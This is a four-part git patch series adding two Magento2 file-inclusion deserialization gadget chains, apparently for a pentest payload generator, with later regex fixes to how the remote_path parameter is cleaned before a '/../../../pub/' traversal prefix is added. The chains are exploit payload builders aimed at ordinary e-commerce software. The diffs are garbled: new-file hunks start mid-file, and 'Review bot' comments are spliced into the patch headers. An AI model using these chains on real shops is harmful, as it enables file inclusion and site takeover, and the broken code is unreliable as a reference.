From c19ab2b91bf24aa243150c0fb07adeab92821ae4 Mon Sep 17 00:00:00 2001
From: mcdruid
Date: Tue, 26 Nov 2024 11:24:30 +0000
Subject: [PATCH 1/4] two FI Gadget Chains for Magento2
---
 gadgetchains/Magento2/FI/1/chain.php | 34 +++++++++++++++++++++
 gadgetchains/Magento2/FI/1/gadgets.php | 18 +++++++++++
 gadgetchains/Magento2/FI/2/chain.php | 41 ++++++++++++++++++++++++++
 gadgetchains/Magento2/FI/2/gadgets.php | 33 +++++++++++++++++++++
 4 files changed, 126 insertions(+)
 create mode 100644 gadgetchains/Magento2/FI/1/chain.php
 create mode 100644 gadgetchains/Magento2/FI/1/gadgets.php
 create mode 100644 gadgetchains/Magento2/FI/2/chain.php
 create mode 100644 gadgetchains/Magento2/FI/2/gadgets.php
diff --git a/gadgetchains/Magento2/FI/1/chain.php b/gadgetchains/Magento2/FI/1/chain.php
new file mode 100644
index 00000000..807a5742
--- /dev/null
+++ b/gadgetchains/Magento2/FI/1/chain.php
@@ -0,0 +1,34 @@
+remote = $remote;
+ $this->lockList[] = $lockList;
+ }
+ }
+}
+
+namespace Magento\Framework\App\ObjectManager\ConfigLoader {
+ class Compiled {
+ }
+}
\ No newline at end of file
diff --git a/gadgetchains/Magento2/FI/2/chain.php b/gadgetchains/Magento2/FI/2/chain.php
new file mode 100644
index 00000000..07c02bf8
--- /dev/null
+++ b/gadgetchains/Magento2/FI/2/chain.php
@@ -0,0 +1,41 @@
+remote = $remote;
+ $this->lockList[] = $lockList;
+ }
+ }
+}
+
+namespace Magento\Framework\Interception {
+ class PluginListGenerator {
+ private $directoryList;
+
+ function __construct($directoryList) {
+ $this->directoryList = $directoryList;
+ }
+ }
+}
+
+namespace Magento\Framework\App\Filesystem {
+ class DirectoryList {
+ private $directories;
+
+ function __construct($file, $id) {
+ $this->directories[$id]['path'] = $file;
+ }
+ }
+}
\ No newline at end of file
From d09f65e1407acd25ead8b3adb72d39bcdad105cb Mon Sep 17 00:00:00 2001
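Review bot: The stub classes added by patch 1/4 in both new-file hunks (FI/1 and FI/2) carry no comment saying which Magento class and release they mirror. A one-line header per stub, for example `// Stub mirroring Magento\Framework\App\Filesystem\DirectoryList (checked against Magento <VERSION-PLACEHOLDER>)`, would let maintainers and defenders map each chain to the class names that show up in a serialized payload (`Compiled`, `PluginListGenerator` and `DirectoryList` in the visible lines). Both hunks also end with `\ No newline at end of file`; add the trailing newline. The opening part of each new file is not present on this page, so this is based only on the visible tail of each hunk.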
From: mcdruid
Date: Tue, 26 Nov 2024 15:09:11 +0000
Subject: [PATCH 2/4] make regex patterns case-insensitive for removal of prefix/suffix
---
 gadgetchains/Magento2/FI/1/chain.php | 2 +-
 gadgetchains/Magento2/FI/2/chain.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/gadgetchains/Magento2/FI/1/chain.php b/gadgetchains/Magento2/FI/1/chain.php
index 807a5742..0625f890 100644
--- a/gadgetchains/Magento2/FI/1/chain.php
+++ b/gadgetchains/Magento2/FI/1/chain.php
@@ -19,7 +19,7 @@ public function process_parameters(array $parameters)
 $parameters = parent::process_parameters($parameters);
 // Remove the .php suffix if it has been specified, as it will be added
 // by the application.
- $parameters['remote_path'] = preg_replace('#.php$#', '', $parameters['remote_path']);
+ $parameters['remote_path'] = preg_replace('#.php$#i', '', $parameters['remote_path']);
 $parameters['remote_path'] = '/../../../pub/' . ltrim($parameters['remote_path'], '/');
 return $parameters;
 }
diff --git a/gadgetchains/Magento2/FI/2/chain.php b/gadgetchains/Magento2/FI/2/chain.php
index 07c02bf8..07d03c06 100644
--- a/gadgetchains/Magento2/FI/2/chain.php
+++ b/gadgetchains/Magento2/FI/2/chain.php
@@ -19,7 +19,7 @@ public function process_parameters(array $parameters)
 $parameters = parent::process_parameters($parameters);
 // Remove the prefix and suffix if they have been specified, as they
 // will be added by the application.
- $parameters['remote_path'] = preg_replace('#(^rsl::|.php$)#', '', $parameters['remote_path']);
+ $parameters['remote_path'] = preg_replace('#(^rsl::|.php$)#i', '', $parameters['remote_path']);
 return $parameters;
 }
From ae85d9a359644a00d7cd4ca8958859127d6e1247 Mon Sep 17 00:00:00 2001
From: mcdruid
Date: Tue, 26 Nov 2024 16:42:56 +0000
Subject: [PATCH 3/4] do not anchor prefix pattern so it works for absolute paths too
---
 gadgetchains/Magento2/FI/2/chain.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
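Review bot: In patch 2/4 the `$` in `'#.php$#i'` (FI/1 hunk) and in `'#(^rsl::|.php$)#i'` (FI/2 hunk) also matches just before a final newline, so a `remote_path` value that ends in `.php` followed by a line break has the suffix removed but keeps the newline. Adding the `D` modifier, as in `'#.php$#iD'`, pins the match to the true end of the string. The result of `preg_replace()` is also used without a null check, and in the FI/1 hunk it is passed straight to `ltrim()`. `process_parameters` starts outside both hunks, so any earlier validation is not visible here.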
diff --git a/gadgetchains/Magento2/FI/2/chain.php b/gadgetchains/Magento2/FI/2/chain.php
index 07d03c06..18c16d50 100644
--- a/gadgetchains/Magento2/FI/2/chain.php
+++ b/gadgetchains/Magento2/FI/2/chain.php
@@ -19,7 +19,7 @@ public function process_parameters(array $parameters)
 $parameters = parent::process_parameters($parameters);
 // Remove the prefix and suffix if they have been specified, as they
 // will be added by the application.
- $parameters['remote_path'] = preg_replace('#(^rsl::|.php$)#i', '', $parameters['remote_path']);
+ $parameters['remote_path'] = preg_replace('#(rsl::|.php$)#i', '', $parameters['remote_path']);
 return $parameters;
 }
From a4cb3930f6d604f52e43d1f4bc0ce7b4c25e5cb5 Mon Sep 17 00:00:00 2001
From: mcdruid
Date: Tue, 26 Nov 2024 20:22:34 +0000
Subject: [PATCH 4/4] escape dots in the regex patterns
---
 gadgetchains/Magento2/FI/1/chain.php | 2 +-
 gadgetchains/Magento2/FI/2/chain.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/gadgetchains/Magento2/FI/1/chain.php b/gadgetchains/Magento2/FI/1/chain.php
index 0625f890..ac9a1d01 100644
--- a/gadgetchains/Magento2/FI/1/chain.php
+++ b/gadgetchains/Magento2/FI/1/chain.php
@@ -19,7 +19,7 @@ public function process_parameters(array $parameters)
 $parameters = parent::process_parameters($parameters);
 // Remove the .php suffix if it has been specified, as it will be added
 // by the application.
- $parameters['remote_path'] = preg_replace('#.php$#i', '', $parameters['remote_path']);
+ $parameters['remote_path'] = preg_replace('#\.php$#i', '', $parameters['remote_path']);
 $parameters['remote_path'] = '/../../../pub/' . ltrim($parameters['remote_path'], '/');
 return $parameters;
 }
diff --git a/gadgetchains/Magento2/FI/2/chain.php b/gadgetchains/Magento2/FI/2/chain.php
index 18c16d50..b0c9e014 100644
--- a/gadgetchains/Magento2/FI/2/chain.php
+++ b/gadgetchains/Magento2/FI/2/chain.php
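Review bot: In the patch 3/4 hunk the comment above the call still reads "Remove the prefix and suffix", but the unanchored `'#(rsl::|.php$)#i'` now deletes `rsl::` wherever it appears in `remote_path`, and every occurrence of it, not only a leading one. If that is intended, the comment should say so, e.g. `// Remove any "rsl::" marker and a trailing .php suffix if specified, as the application adds them.`; if only a leading marker was meant (this is a guess from the commit subject), the pattern is now wider than the stated intent. The capture group is never referenced and could be written `(?:...)`. `process_parameters` starts outside the hunk.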
@@ -19,7 +19,7 @@ public function process_parameters(array $parameters)
 $parameters = parent::process_parameters($parameters);
 // Remove the prefix and suffix if they have been specified, as they
 // will be added by the application.
- $parameters['remote_path'] = preg_replace('#(rsl::|.php$)#i', '', $parameters['remote_path']);
+ $parameters['remote_path'] = preg_replace('#(rsl::|\.php$)#i', '', $parameters['remote_path']);
 return $parameters;
 }